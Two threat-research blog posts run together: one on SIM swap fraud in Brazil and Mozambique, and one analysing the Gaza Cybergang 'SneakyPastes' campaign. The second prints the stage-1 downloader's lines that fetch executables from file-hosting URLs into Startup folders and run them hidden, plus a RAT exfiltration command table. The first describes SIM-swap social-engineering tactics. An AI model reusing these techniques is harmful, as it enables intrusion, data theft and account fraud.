Mobile payments are now huge in developing countries, especially in Africa and Latin America. Mobile phone-based money transfers allow users to access financing and micro-financing services, and to easily deposit, withdraw and pay for goods and services with a mobile device. In some cases, almost half the value of some African countries’ GDP goes through mobile phones. But nowadays these mobile payments are suffering a wave of attacks and people are losing their money – all powered by SIM swap fraud conducted on a major scale.

Like many other countries, Brazil and Mozambique had a high rate of SIM swap fraud. Both countries speak the same language (Portuguese) and were facing the same problem. By using social engineering, bribery, or even a simple phishing attack, fraudsters take control of customers’ phone numbers in order to receive mobile money transactions, or to collect the home banking OTPs to complete a transfer of funds or steal users’ money. In Mozambique this sort of crime was all over the national news, with the media questioning the integrity of the banks and mobile operators, suggesting they may be colluding in the scams. The reputation of the banks and operators was at stake; something urgent needed to do be done to protect their customers.

In Brazil the problem was affecting not only average citizens but also politicians, ministers, governors and high-profile businessmen. Online banking customers were also experiencing losses from their accounts. One organized gang alone in Brazil was able to SIM swap 5,000 victims. At Mozambique’s largest bank they had a monthly average of 17.2 cases of SIM swap fraud; the true impact nationwide is difficult to estimate as most banks don’t publicly share statistics. As was the case in Brazil, some of the victims were high-profile businessmen who had up to US$50,000 stolen from their bank accounts.

In Mozambique a nationwide push saw the operators and the banks sit down together and come up with a solution that drastically decreased the level of fraud. This new solution was designed locally, was surprisingly simple, but at the same time very effective; after the biggest and most popular bank in the country adopted it, there was an immediate reduction in the number of frauds. The Central Bank of Mozambique saw the potential of the platform and is considering making it mandatory for all banks.

In this article we’ll detail how very organized cybercrime developed their own ecosystem of fraud and how Mozambique was able to solve the problem of money being stolen in SIM swap fraud schemes, where mobile payments are an essential part of everyday life.

How the cybercriminals do it

The scam begins with a fraudster gathering details about the victim by using phishing emails, by buying information from organized crime groups, via social engineering or by obtaining the information following data leaks. Once the fraudster has obtained the necessary details they will then contact the victim’s mobile telephone provider. The fraudster uses social engineering techniques to convince the telephone company to port the victim’s phone number to the fraudster’s SIM, for example, by impersonating the victim and claiming they have lost their phone. They then ask for the number to be activated on a new SIM card.

After that the victim’s phone loses its connection to the network and the fraudster receives all the SMSs and voice calls intended for the victim. This allows the fraudster to intercept any one-time passwords sent via SMS or telephone calls made to the victim; all the services that rely on an SMS or telephone call authentication can then be used.

We have found that some of the processes used by mobile operators are weak and leave customers open to SIM swap attacks. For example, in some markets in order to validate your identity the operator may ask for some basic information such as full name, date of birth, the amount of the last top-up voucher, the last five numbers called, etc. Fraudsters can find some of this information on social media or by using apps such as TrueCaller to get the caller name based on the number. With a bit of social engineering they also try to guess the voucher amount based on what’s more popular in the local market. And what about the last five calls? One technique used by the fraudsters is to plant a few ‘missed calls’ or to send an SMS to the victim’s number as bait so that they call back.

Sometimes the target is the carrier, and not the customer. This happens when a carrier’s employees working in branches in small cities are sometimes unable to identify a fraudulent or adulterated document, especially branches located in kiosks or shopping malls, allowing a fraudster to activate a new SIM card. Another big problem is insiders, with some cybercriminals recruiting corrupt employees, paying them $10 to $15 per SIM card activated. The worst attacks occur when a fraudster sends a phishing email that aims to steal a carrier’s system credentials. Ironically, most of these systems don’t use two-factor authentication. Sometimes the goal of such emails is to install malware on the carrier’s network – all a fraudster needs is just one credential, even from a small branch from a small city, to give them access to the carrier’s system.

How much does a SIM swap of your number cost? It depends on how easy or hard it is to do. It’s easier with some carriers than others. A SIM swap for a famous celebrity or a politician can cost thousands of dollars. These are the prices stated on Brazilian underground forums, or occasionally on closed Facebook communities:

Carrier A Carrier B Carrier C Carrier D Carrier E $10 $15 $20 $25 $40

The interest in such attacks is so great among cybercriminals that some of them decided to sell it as a service to others. Normally, a criminal can conduct an attack in two or three hours without much effort, because they already have access to the carrier’s system or an insider.

A Portuguese-speaking cybercriminal selling a SIM swap service. They call it ‘recover chip’…

Brazil has a very organized cybercrime scene, and it’s only natural that its actors will export their techniques and tactics to their fellow cybercriminals acting in other countries, especially in other Portuguese-speaking countries (Portugal, Mozambique, and Angola).

Falling victim – me too

The fraudsters fire in all directions; sometimes their attacks are targeted, sometimes they’re not. All a fraudster needs is your number, and it’s very easy to find it by searching through leaked databases, buying that database from data brokers (some of them are legal), or using apps like TrueCaller and other similar apps that offer caller ID and spam blocking, but which also have some privacy issues and a name-based search for subscribers. Sometimes your number can be found by simply doing a Google search.

The first sign that something is not quite right is when you lose your smartphone signal somewhere that normally has a strong signal. In a hotel last year while on a business trip my corporate smartphone suddenly lost its mobile connection, with no data or calls for about 30 minutes. I tried to solve the problem by connecting to any available network (I was using roaming so it wasn’t a problem), but all of them rejected my device:

As a final resort, I tried rebooting the device and connecting it again, with no success. After that I decided to call (using VoiP) the carrier I’m a customer of to find out what was going on. The operator told me someone had reported my number as “lost or stolen” and asked to activate it on another SIM card. This came as no surprise at all, because the number of victims in Brazil reporting the same problem is growing considerably. What was most surprising was the ease with which the employee gave me this information, as though it was nothing critical, suggesting it was a common occurrence for them. I immediately informed the operator about the ownership of the number, confirmed some personal information and the problem was quickly resolved.

Anyone can be a victim.

Brazil: extortion, WhatsApp and fintechs

WhatsApp is the most popular instant messenger in a number of countries where the app is used by Brazilian fraudsters to steal money in an attack known as ‘WhatsApp cloning’. After a SIM swap, the first thing the criminal does is to load WhatsApp and all the victim’s chats and contacts. Then they begin messaging the contacts in the victim’s name, citing an emergency and asking for money. In some cases, they feign a kidnapping situation, asking for an urgent payment – and some of the contacts will send money.

Brazilian TV has reported on several such cases, with one family losing US$3,000. Some of the attacks targeted companies, with executives supposedly contacting their financial departments asking for funds, when in fact it was fraudsters using WhatsApp accounts hijacked in a SIM swap. It’s like a BEC (Business E-mail Compromise) but using your WhatsApp account.

Extortion attacks via WhatsApp start with a SIM swap

The fintech boom in Brazil started with companies offering credit cards and bank accounts with no fees, especially after the successful launch of Nubank in 2013. Since then, similar solutions have emerged, such as Banco Inter, Next, Digio and Neon, most of them tied to a digital account. Most of them still rely on two-factor authentication via SMS. The ease with which a SIM swap can be performed helped fraudsters find new ways of emptying users’ banking accounts. That’s what happened to the customers of popular Brazilian fintech meupag!, according to a report by Gizmodo Brasil.

The fraudsters performed a SIM swap, activating the victim’s number on another SIM card. Then, on a smartphone with the pag! app installed, the fraudsters used the app’s password recovery function and a code was sent via SMS, allowing the bad guys to gain total control of the user’s account in the app. Once this access is obtained the fraudsters performed several illegal payments with the credit card issued in the app in the name of the victim. Some victims reported losses of US$3,300 in fraudulent transactions.

Mozambique: bribery, banks and a solution

Mobile payments are huge in African countries. Traditional banks are not accessible in rural areas where poor farmers would literally have to walk hundreds of kilometers to reach the closest branch. Mobile operators saw this gap and took the opportunity to invest and diversify their business into micro-finance services and reach areas where there is mobile coverage – all that’s required is a basic mobile phone.

Mobile payment systems like M-Pesa have made a huge impact in Africa. In Mozambique approximately US$5 billion per year is transacted through this platform which corresponds to approximately 41% of the country’s GDP, and in more mature and populated markets like Kenya it goes up to US$33 billion or 48% of the total GDP volume.

Most local banks rely on a one-time password (OTP), with many preferring not to use physical or software tokens as this increases the cost and complexity for customers, especially those on low incomes. The banks therefore try to keep it simple, using an SMS as the second factor. This shows that, perhaps without them even realizing it, they share the responsibility of securing their customers’ bank accounts with the mobile operators.

Mobile fraud on the rise

With financial inclusion services prospering in Africa, the flip side is that it opens a world of opportunities to fraudsters. The population’s technological literacy is very low, especially those on lower incomes. Remarkably, many of the fraudsters are prisoners who somehow have access to mobile phones and a lot of spare time on their hands.

Most SIM swap frauds operate in the same way. There are syndicates that identify and collude with employees from the banks and mobile operators. The bank employee is responsible for providing information about an account balance and detailed information about the victim. Armed with this information, the fraudsters conduct a phishing or SMmiShing attack to gain access to the victim’s online banking account and its verification codes.

In the second part of the attack, since the banks use SMS for their OTPs, the criminals need to conduct a SIM swap or SIM card hijacking to redirect all the victim’s communications to a new SIM card that’s in their possession. To achieve this, these syndicates rely on some cooperation from mobile operator employees, though the latter can be easily tracked down and detained. This is why the criminals mostly make use of forged documents that are required by the operator for the SIM swap and present them at mobile retail stores as part of a fraudulent request for a new SIM card. The staff at these stores often don’t have sufficient training to detect forged documents, and even if they do, sometimes the documents are authenticated by an official notary who has been bribed.

Since a phone number can only work on one SIM card at a time, the victim’s original SIM card is immediately blocked and, voilà, the fraudster now has control of the victim’s mobile communications.

The solution adopted in Mozambique

A nationwide push saw the operators and the banks sit down together and come up with a solution that drastically decreased the level of fraud. The new solution was designed locally, was surprisingly simple, but at the same time very effective; after the biggest and most popular bank in the country adopted it, there was a drastic reduction in the number of frauds. The Central Bank of Mozambique saw the potential of the platform and now wants to make it mandatory for all banks.

When a SIM card is hijacked there’s a good chance the fraudster will attempt to transfer funds from the bank account within minutes of the SIM swap to prevent the original owner from having enough time to complain to the mobile operator and regain control of the number.

After a subscriber’s number is blocked following a SIM swap, the victim usually thinks there’s a network problem and only when they realize that other people nearby still have a network connection do they decide to contact the call center from another phone or physically go to a retail shop to find out what is going on. There have been cases like Fabio’s above in which the fraudsters know the victim and wait until the target travels to another country so that it’s even harder for the person to go to a retail store and regain control of the mobile number. If the user has not turned on roaming, they typically only regain control of their numbers within one or two days.

How the solution works

All mobile operators in Mozambique made a platform available to the banks on a private API that flags up if there was a SIM swap involving a specific mobile number associated with a bank account over a predefined period. The bank then decides what to do next.

Most banks block any transaction from a mobile number that has undergone a SIM card change within the last 48 hours, while others opt for the longer period of 72 hours. This period of 48-72 hours is considered a safe period during which the subscriber will contact their operator if they have fallen victim to an unauthorized SIM card change.

There’s also the possibility that the mobile owner has legitimately changed their SIM card, and therefore unable to perform an online transaction for the next 48 hours. In such cases, some of the banks we spoke to have a process that requires face-to-face verification in a branch office – a reasonable compromise in the circumstances.

Platform workflow
  1. The banks are connected to different mobile operators through a VPN connection so that all traffic is secure.
  2. The online banking system conducts a REST API query to the respective mobile operator giving the mobile number (MSISDN) and the period (24-72 hours) as arguments.
  3. The mobile operator simply returns in real time: True or False.
  4. If the query is False, the bank allows the transaction as normal. If True, the bank blocks the transaction and may request additional steps to verify the transaction.

It is important to reiterate that the mobile operator does not share personal identifiable information (PII) with a third party, in this case banks. The national regulator for communications deemed the sharing of non-identifiable information by operators with the banks to be a case of national interest.

Once the platform was implemented, the level of online banking fraud stemming from SIM swap attacks fell dramatically, with almost no cases involving banks that have implemented the anti-SIM swap platform. As a result, we saw an increase of WhatsApp hijacking in Mozambique, similar to what happened in Brazil.

Conclusion: how not to be the next victim Voice and SMS must be avoided as authenticity mechanisms

Mobile operators rely on legacy protocols for communication such as Signaling System No. 7, or SS7, which was initially developed in the 1970s. This protocol has security flaws that allow the interception of SMS messages or voice calls. By today’s standards the phone/SMS is no longer considered a secure method of authenticity if you want to protect high-value information such as bank accounts. An attack on Reddit in 2018 was a wake-up call for most companies.

The National Institute of Standards and Technology (NIST) in the USA explicitly deprecated the use of SMS for 2FA in a special publication, stating:

Verifiers SHOULD consider risk indicators such as device swap, SIM change, number porting, or other abnormal behavior before using the PSTN to deliver an out-of-band authentication secret.” (NIST 800-63B)

Some banks use software tokens that can be bound to a phone IMEI number (unique identifier); however, the difficult process of enrollment and maintaining changes, for example, when the user replaces the phone, deter many financial institutions.

When possible, we recommend users avoid two-factor authentication via SMS, opting instead for other ways, such as generating an OTP in a mobile app (like Google Authenticator) or using a physical token. Unfortunately, some online services don’t offer an alternative; in that case, the user needs to be aware of the risks.

The new era of biometrics

Some operators have implemented additional security mechanisms that require the user to authenticate through voice biometrics using a passphrase such as “my voice is my password” – the technology works reasonably well, even detecting if the voice is a recording, or if the user has flu. However, the major stumbling block that we observed is the very low enrollment base. Besides, it’s considered an expensive solution, especially for emerging markets, and requires some additional effort to integrate with backend systems.

Automated SMS: “Your number will be deactivated from this SIM card.”

When a SIM change is requested, operators can implement an automated message that’s sent to the number alerting the owner that there’s been a SIM change request and if it’s not authorized, the subscriber must contact the fraud hotline. This will not prevent the hijacking itself, it will instead alert the subscriber so that they can respond faster in the case of malicious activity. The main drawback is that the subscriber may be outside the coverage area.

Some carriers have implemented an additional layer of confirmation for any case of SIM activation, offering the option of configuring a password in their systems. This password will be required for any changes associated with your number, such as big changes in your monthly bill or even when you need a new SIM card. Talk to your carrier to check if they already offer this additional security for your number.

Process improvement

As we mentioned above, some processes contain weaknesses, especially in emerging markets. It’s important to dissect all the stages of the process and understand what the underlying weaknesses are. In the case of Mozambique, there’s a thriving black market that makes it possible to obtain fake documents. These documents can then be presented to operators as proof of identity for SIM swaps.

Activate 2FA on WhatsApp

To avoid WhatsApp hijacking, it’s of paramount importance to activate 2FA using a six-digit PIN on your device. In the event of hijacking, you’ll have another layer of security that is not so easy to bypass.

Request your number be unlisted from TrueCaller and similar apps

TrueCaller is a crowdsourced phone book. It allows people to be identified through their mobile number. However, as we mentioned before, fraudsters use this tool to find out more information about you. You can, and should, request that your number is unlisted from this global phone book.

Despite the fact that attacks on 2FA with the use of tools such as Evilginx are becoming more sophisticated, software tokens still provide a reasonable level of security by today’s standards. Whilst there is no silver bullet solution, we believe that declaring the death of SMS-based 2FA is the way to go. This is especially true when it comes to online banking, social media and email services.

2019. április 10.

Gaza Cybergang Group1, operation SneakyPastes

Gaza Cybergang(s) is a politically motivated Arabic-language cyberthreat actor, actively targeting the MENA (Middle East North Africa) region, especially the Palestinian Territories.

The confusion surrounding Gaza Cybergang’s activities, separation of roles and campaigns has been prevalent in the cyber community. For a while, the gang’s activities seemed scattered, involving different tools and methods, and different malware and infection stages, although there was an alignment in its goals…

During our 2018 monitoring of this group, we were able to identify different techniques utilized by very similar attackers in the MENA region, sometimes on the same target. The findings led to us distinguishing between three attack groups operating within Gaza Cybergang:

  • Gaza Cybergang Group1 (classical low-budget group), also known as MoleRATs;
  • Gaza Cybergang Group2 (medium-level sophistication) with links to previously known Desert Falcons;
  • Gaza Cybergang Group3 (highest sophistication) whose activities previously went by the name Operation Parliament.

The groups use different styles and, in some cases, techniques, but deploy common tools and commands after initial infection. The three attack groups were identified sharing victims. For example, Group1 would deploy a script to infect a specific victim with malware belonging to Group2, or similarly between Group2 and Group3.

More information on previous Desert Falcons (Group2) and Operation Parliament (Group3) activities can be found below:

Additional findings on Gaza Cybergang Group2 and Group3 will be presented in future publications. For more information, please contact: intelreports@kaspersky.com


Gaza Cybergang Group1, described in this post, is the least sophisticated of the three attack groups and relies heavily on the use of paste sites (with the operation name SneakyPastes) in order to gradually sneak a remote access Trojan (RAT) or multiple, onto victim systems. The group has been seen employing phishing, with several chained stages to evade detection and extend command and control server lifetimes. The most popular targets of SneakyPastes are embassies, government entities, education, media outlets, journalists, activists, political parties or personnel, healthcare and banking.

In this post, we’ll take a closer look at Gaza Cybergang Group1, including:

  1. Updated 2018/2019 tactics, techniques and procedures
  2. Victimology of the group between Jan 2018 and Jan 2019
  3. Historical checkpoints and politicized graphical decoys in Appendix I
  4. Full list of indicators of compromise in Appendix II
Technical analysis

Through our continuous monitoring of threats during 2018, we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel. Gaza Cybergang Group1 is an attack group with limited infrastructure and an open-source type of toolset, which conducts widespread attacks, but is nevertheless focused on Palestinian political problems. The attackers rely a lot on chained attack stages to evade quick detection and hide the communication infrastructure.

After an analysis of the samples, and through collaboration efforts with law enforcement agencies, we were able to uncover the full cycle of the intrusions that spread across the majority of the cyber kill chain, including but not limited to the toolset used, TTPs, infrastructure, action on objectives and the victimology. These efforts have led to the takedown of a large portion of the related infrastructure.

In this campaign, Gaza Cybergang used disposable emails and domains as the phishing platform to target the victims. Then pastebin.com, github.com, mailimg.com, upload.cat, dev-point.com and pomf.cat were used as channels for the different malware stages before achieving a full RAT implementation, which then communicates with the corresponding C2 server.

We have identified several implants that leveraged PowerShell, VBS, JS, and dotnet for resilience and persistence. The final stage, however, is a dotnet application that takes several commands such as directory listing, screenshot, compress, upload, etc. It then creates random long string folder names in temp directories to host the collected files per category before compressing, encrypting and uploading to the C2 server.


The threat actor seemed able to spread attacks widely, but only deployed additional tools and data collection functions in specific cases, as though they had a target list or a filter for targeted victims. Phishing emails with political themes were used in the majority of the observed attack emails. These were necessary to lure the intended type of victims – people involved in politics.

In order to meet the phishing emails’ infrastructure requirements, disposable domains and emails were used as the delivery medium. On occasions, the phishing emails contained links to external domains to download the first stage, and sometimes the first stage was attached to the email itself.

If the user clicks on the link, he will be prompted to download a RAR file that contains the stage 1 malware/lure, which he will execute afterwards.

Intrusion life-cycle analysis

The diagram below displays at a high level the steps taken by typical Gaza Cybergang Group1 lure samples. While different samples may use different methods to infect (i.e. invoke PowerShell, VBS, .NET app downloader, etc.), they generally stick to the same scenario of a persistent RAT that steals data and uploads it to the C2 server despite the different hard-coded domains.

Stage 1 sample file: 3amadi_hamas.zip
MD5: e686ffa90b2bfb567547f1c0dad1ae0b
Type: Compressed container
Child file/lure name: محضر اجتماع العمادي مع هنية رئيس حماس امس الاحد .exe
Child file/lure MD5: 92dd0f16e8ae274d83ba1d0d5b2e342

This sample ZIP file, which is similar to many other stage 1 downloaders in this campaign, contains an executable that is a compiled AutoIt script and which embeds some interesting functions (listed in the table below). The executable attempts to download a couple of files from different sources and saves them in the AppData and Startup folders for persistence, then invokes the first downloaded file – Picture2.exe.

Embedded functions Sleep, 15000 UrlDownloadToFile, https://upload.cat/0037e96c45ac2098?download_token=fa26750b7e73f0081c44831d0aaf9863c75592724dbc2f781ca495f9b5fbd4ac, %AppData%\Microsoft\Windows\Picture2.exe 6240c31d9a82dc70a38f78d44a1ee239 sleep,4000 UrlDownloadToFile, https://upload.cat/089590f6d72aeaef?download_token=dd21809321669aa2229b20b57e2c9d34a3b507b5df7406bcac5dbb87cd169b78, %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\Picture4.exe cab62bb5f00fe15683c6af760c8e8f7e sleep,4000 UrlDownloadToFile, https://dev-point.co/uploads1/4ee1d5a5b0e41.jpg, %AppData%\Thr0om.jpg c90f9c600169cbedbeb23316ea61e214 sleep,4000 UrlDownloadToFile, https://upload.cat/ec9d388339b19e1c?download_token=131d5450c192d0591f3d06841eacc5bf5f344be9725be9456e2c222d0b4831e2, %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\333Po333.exe 8c5f8d1ab7baa9a0764cd5650ddecd8e sleep,5000 UrlDownloadToFile, https://upload.cat/9a08bc13e683d330?download_token=90f1ebb4e1f52835f502bea4307686afc1eb1cdee973cef1fb043febb2a92078, %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\WindowsFrom444444.exe 2a3aa1d207030d8c7dc3cfc9c2d9f9f1 sleep,5000 UrlDownloadToFile, https://upload.cat/a1c05c819dadeefb?download_token=c6535b11a9f9bbf9e7681be8753f2058bac0df5264744be76605244e96a388f5, %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\WindowsFrom355353.exe bd83269da75741303a19b826c5f9627d sleep,5000 RunWait %AppData%\Microsoft\Windows\Picture2.exe ,, hide sleep,2000 After analyzing the files downloaded from the above first stage malware, it was clear that the threat actor wanted to achieve stable persistence on the victim machine, and also used more than one technique to exfiltrate data. The analyzed samples had a lot of similarities in terms of the code used and especially in the persistence techniques. Malware features

All the stages’ executables are created as chains to avoid detection and protect the C2 server. They consist mainly of persistence mechanisms and simple instructions despite their different forms (VBS scripts, PowerShell scripts, known software with open source code that can be backdoored, and in-house built dotnet apps). The RAT, however, had a multitude of functionalities (as listed in the table below) such as to download and execute, compress, encrypt, upload, search directories, etc. The threat actor’s main objective for using this RAT (known as Razy/NeD worm/Wonder Botnet) was obvious from the victim data that was collected – it was to search for specific file extensions such as PDF, DOC, DOCX, XLS, and XLSX, where they are compressed in RAR files per category, stored in temp directories within a folder named by victim ID (bot ID – long MD5 string), encrypted and uploaded to the C2.

Command Brief Description KEYWORD Downloads encrypted strings found on the /Feed server page that represents specific keywords of interest which, if found, then compresses/encrypts using Winrar appending “Keyword” in the file name and uploading to the C2 using a POST command at the path “/FeedBack.php”. FeedBack.php validates the sender by User-Agent, saves the data in the “RAR” server directory and stores the metadata in the mssql database for later reference.
KEY Trigger to upload all data gathered to the C2 using a POST command at the path “/log.php”. Log.php validates the sender by User-Agent, saves the data in the “UP” server directory and stores the metadata in the mssql database for later reference.

KEYS Deletes the file named by tempPath + “ky” file so as not to upload anything. REUPLOAD Re-uploads recent data to the C2 server using POST at the path “/FeedBack.php”. RESTARTME Restarts the RAT application process. BLOCK Creates a file in the Temp path and names it “Block~” + PCID to kill the RAT. SCREEN Takes a PNG screenshot of the main screen and names the file with timestamps, then uploads it to the C2 server using POST at the path “/FeedBack.php”. LAN Creates a file in the Temp path and names it “LA” + PCID to possibly spread through LAN. Note: this seems to refer to an unloaded feature/module of the RAT that is not currently in use. LANS Deletes the file created by the LAN command to reverse the effect. USB Creates a file in the Temp path and names it “us” + PCID then invokes another program module named Remo.test to identify removable drives. USBS Deletes the file created by the USB command to reverse the effect. HD Creates a file in the Temp path and names it “hd” + PCID then invokes another program module named hd.test1 to identify logical drives. HDS Deletes the file created by the HD command to reverse the effect. SHUTDOWN Shuts down the system using cmd /s /t 0 RESTART Reboots the system using cmd /r /t 0 PROCANDSOFT Lists all active processes and all installed software and uploads the results to the C2 server using a POST command at the “/log.php”. DEL-TEMP Deletes all files in the “AppData/Local/Temp” path. RAR Creates RAR files per logical drive containing data with timestamps for the past 7 days, then uploads RAR to the C2 server using a POST command at the path “/FeedBack.php”. RARM Creates RAR files per logical drive containing data with timestamps for the past 30 days, then uploads RAR to the C2 server using a POST command at the path “/FeedBack.php”. RARW Creates RAR files per logical drive containing data with timestamps for the past 7 days, then uploads RAR to the C2 server using a POST command at the path “/FeedBack.php”. KILL Kills system processes. Infrastructure

In 2018, the threat actor mostly relied on a single C2 server ( and rotated a multitude of domain names over a period of time. However, the attacks different stages were hosted on a variety of free sites such as Mailimg, Github, Pastebin, dev-point.co, a.pomf.cat, and upload.cat.

The phishing email infrastructure though relied on disposable email providers such as bit-degree.com, mail4gmail.com, careless-whisper.com and others.


Based on the analyzed metrics, the victims were spread across 39 countries and reached 240+ unique victims. The Palestinian Territories host the majority of the victims, followed by Jordan, Israel, then Lebanon, as noted in the below table.

The most targeted entities are embassies, government entities, education, media outlets, journalists, activists, political parties or personnel, healthcare and banking.

Country Number of victims Palestinian Territories 110 Jordan 25 Israel 17 Lebanon 11 Saudi Arabia 9 Syria 9 Egypt 7 UAE 6 Senegal, France, Germany, Iran, Malaysia, Belgium, Bosnia and Herzegovina, Libya, Morocco, Spain, Sri Lanka, Tunisia, Afghanistan, Armenia, Azerbaijan, Cyprus, India, Indonesia, Iraq, Ireland, Italy, Kuwait, Oman, Poland, Romania, Russia, Serbia, Slovenia, Sudan, UK, USA < 5 Conclusions

While Gaza Cybergang Group1 described in this post looks like a low sophistication group, with limited infrastructure and attack files that can be found in the wild, they are the most relentless in their attacks, with continuous targeting and high malleability. This has allowed the group to achieve reasonable success against a relatively wide array of victims.

Gaza Cybergang is evolving and adapting to the MENA region – a complex setting with complex requirements. The attacks are now divided into three groups with different levels of sophistication and different levels of targeting. We expect the damage caused by these groups to intensify and the attacks to extend into other regions that are also linked to the complicated Palestinian situation. The attackers also seem to be within reach of more advanced tools, techniques and procedures, and we expect them to rely more on these in future attacks. More information on Desert Falcons (Group2) and Operation Parliament (Group3) will be presented in future publications.

Appendix I – Main historical checkpoints and politicized decoys Gaza Cybergang Group1 2016-2019 MD5 Hash First seen Filename/Decoy Translation/Explanation C2 server B3a472f81f800b32fe6595f44c9bf63b Feb 2016 برقية وزارة الخارجية التركية لسيادتكم حول موضوع هام.exe
Translation: Letter for you from the Turkish Ministry of Foreign Affairs on Russian military operations in Syria en.gameoolines.com ( Df3f3ad279ca98f947214ffb3c91c514
e8a29c7a6f6c0140152ca8a01e336b37 March 2016 president abu mazen meetings with khaled meshaal.lha
dw.downloadtesting.com ( f9bcc21fbb40247167c8c85ed6ef56e3 March 2016 دراسة.lha
Dl.topgamse.com ( D9dbb65a42ffe0575f0e99f7498a593e April 2016 برقية الخارجية السعودية لسيادتكم يرجي الإطلاع – مهم.exe
Translation: Saudi Foreign Affairs telegram for you, please see – important.exe en.gameoolines.com ( 221EEF8511169C0496BBC79F96E84A4A April 2016 تقرير السعودية والمعلومات المتوفر – ونستكمل عند التوفر.exe
Translation: Report on Saudi available information, to be updated with new info upon availability dw.downloadtesting.com ( 62DF4BC3738BE5AD4892200A1DC6B59A
Inside: 55d33d9da371fdfe7871f2479621444a May 2016 معلومات عن هجوم محتمل من الحوثيين على مواقع سعودية – خاص.exe
Translation: Information on possible attack by Houthis on Saudi sites – private dw.downloadtesting.com ( 838696872F924D28B08AAAA67388202E May 2016 عاجل المخابرات المصرية.exe
Translation: Urgent Egyptian Intelligence dw.downloadtesting.com ( e8be9843c372d280a506ac260567bf91 May 2016 برقية وزارة الخارجية السعودية.exe
Translation: Saudi Foreign Affairs telegram.exe
Message on the 34th GCC for Interior Ministers. Wiknet.wikaba.com (
Wiknet.mooo.com 55d33d9da371fdfe7871f2479621444a May 2016 نموذج ترشيج الدورة الخاصة .rar
Translation: Form for private training selection
Application for a certain legal training program for judges in the UAE dw.downloadtesting.com ( e782610bf209e81ecc42ca94b9388580 July 2016 عاجل – مؤتمر ايران.exe
Translation: Urgent – Iran conference dw.downloadtesting.com ( 5db18ab35d29d44dda109f49d1b99f38 June 2017 פרצת פרטיות בכרום מאפשרת לאתרים להקליט אתכם ללא ידיעתכם.exe
Translation: A privacy breach in Chrome allows sites to record you without your knowledge Wiknet.wikaba.com (
wiknet.mooo.com Dae24e4d1dfcdd98f63f7de861d95182 June 2017 مراسلات العتيبة.. وثائق ومعلومات.exe
Translation: Al Otaiba correspondence. Documents and information
Explanation: Yousef Al Otaiba is the current United Arab Emirates ambassador to the United States and Minister of State. The decoy discusses leaks that were reported in 2017 of his emails. Wiknet.wikaba.com (
wiknet.mooo.com 2358dbb85a29167fa66ee6bf1a7271cd April 2018 كتاب وزارة الخارجية الإماراتية لسيادتكم.exe
Translation: Book of the UAE MOFA for you.
Explanation: Document that looks as if it comes from the UAE MOFA discussing a political meeting between GCC countries and the EU in Belgium dw.downloadtesting.com ( 10dfa690662b9c6db805b95500fc753d Sept 2018 محضر اجتماع على الهاتف بين رئيس المكتب السياسي لحركة حماس اسماعيل هنية ورئيس المخابرات المصرية.exe Translation: Minutes of a phone call between the head of the political bureau of Hamas Ismail Haniya and the head of Egyptian intelligence Upload.cat (download site) 6b5946e326488a8c8da3aaec2cb6e70f Sept 2018 Explanation: Document discusses a radio talk by Khalid ‘Abd al-Majid, head of a breakaway faction of the Palestinian Popular Struggle Front, a minor left-wing group within the Palestinian Liberation Organization. He talks about an agreement between al-Nusra and ISIS militants to leave the Palestinian Yarmouk camp in Syria. Wiknet.wikaba.com (
Wiknet.mooo.com 342a4d93df060289b2d8362461875905 Oct 2018 تسريب من داخل القنصلية السعودية حول مقتل جمال خاشقجي.exe Translation: Leak from the Saudi consulate on the death of Jamal Khashoggi Time-loss.dns05.com ( c9cae9026ee2034626e4a43cfdd8b192 Jan 2019 محضر اجتماع السفير القطري العمادي مع الوفد المصري في رام الله .exe Translation: Minutes of meeting of Qatari Ambassador Emadi with the Egyptian delegation in Ramallah Time-loss.dns05.com (
dji-msi.2waky.com Appendix II – Indicators of compromise Type IoC Description RAR md5 E686FFA90B2BFB567547F1C0DAD1AE0B Stage 1 executable / lure RAR md5 CE5AA4956D4D0D66BED361DDD7DB1A3B Stage 1 executable / lure RAR md5 4F34902C9F458008BAE26BFA5C1C00DA Stage 1 executable / lure RAR md5 535F8EA65969A84A68CEAF88778C6176 Stage 1 executable / lure RAR md5 E8A29C7A6F6C0140152CA8A01E336B37 Stage 1 executable / lure RAR md5 E782610BF209E81ECC42CA94B9388580 Stage 1 executable / lure RAR md5 F9BCC21FBB40247167C8C85ED6EF56E3 Stage 1 executable / lure EXE md5 33369AFD3042326E964139CABA1888D3 Stage 2 executable (19182-exe) that invokes Pastebin chain EXE md5 2AD88AE20D8F4CB2C74CAE890FEB337A Stage 2 executable (1918-exe) that invokes Pastebin chain EXE md5 55929FF3E67D79F9E1E205EBD38BC494 Stage 2 executable (21918-exe) that invokes Pastebin chain EXE md5 DA486DF0D8E03A220808C3BFA5B40D06 Stage 2 executable (Adope-exe) that invokes Pastebin chain EXE md5 C7F98F890B21C556D16BFF55E33C33AB Stage 2 executable (Application-exe) that invokes Pastebin chain EXE md5 FAFCC11AF99ACF1B70997BC4BF36CFC0 Stage 2 executable (bind-exe) which is a backdoored Tile Slide Puzzle computer game that invokes Pastebin chain – code freely available EXE md5 28CACBF64141F50426830B385AB1BE4C Dell-cmd – Command string to Delete User Temp directory EXE md5 F30C00E87C7EE27033DC0AC421F3B4F8 Stage 2 executable (D-exe) that invokes Pastebin chain EXE md5 51A59AEC24B5046EC4615728A5B52802 Stage 2 executable (Dv-exe) that invokes Pastebin chain EXE md5 98BDE191AE6E2F7D8D4166C4B21A27D2 Office-vbs – github.gist lolpoke/system1 EXE md5 9E152A6ADCB57D44284AF3B6FD0C94C2 Stage 2 executable (p0w-exe) that invokes Pastebin chain EXE md5 CAB62BB5F00FE15683C6AF760C8E8F7E wPic4-exe – RAT executable similar to Pictures4.exe EXE md5 192DD65864119017AA307BE3363E31BB Powe1-exe – executable that uses scheduled tasks to execute VB scripts EXE md5 71E462260F45C5E621A5F5C9A5724844 WinPeggy4-exe – backdoored Peggy Bees computer game – source code available on Microsoft site EXE md5 AB98768D2440E72F42FCD274806F8D2A WinPeggy-exe – another variant of WinPeggy4.exe EXE md5 DAACE673B1F4DFE8A4D3D021C5190483 Word-hta – VBS code to invoke PowerShell from github.gist..0lol0/system1.ps1 EXE md5 1529AE427FE4EB2D9B4C3073B2AA9E10 Word-vbs – VBS code to invoke PowerShell from github.gist lolpoke/system1.ps1 Powershell md5 CCD324DF0F606469FCA3D1C6FFA951AD System1.ps1 – PowerShell script that invoke a binary in memory that uses NETSH 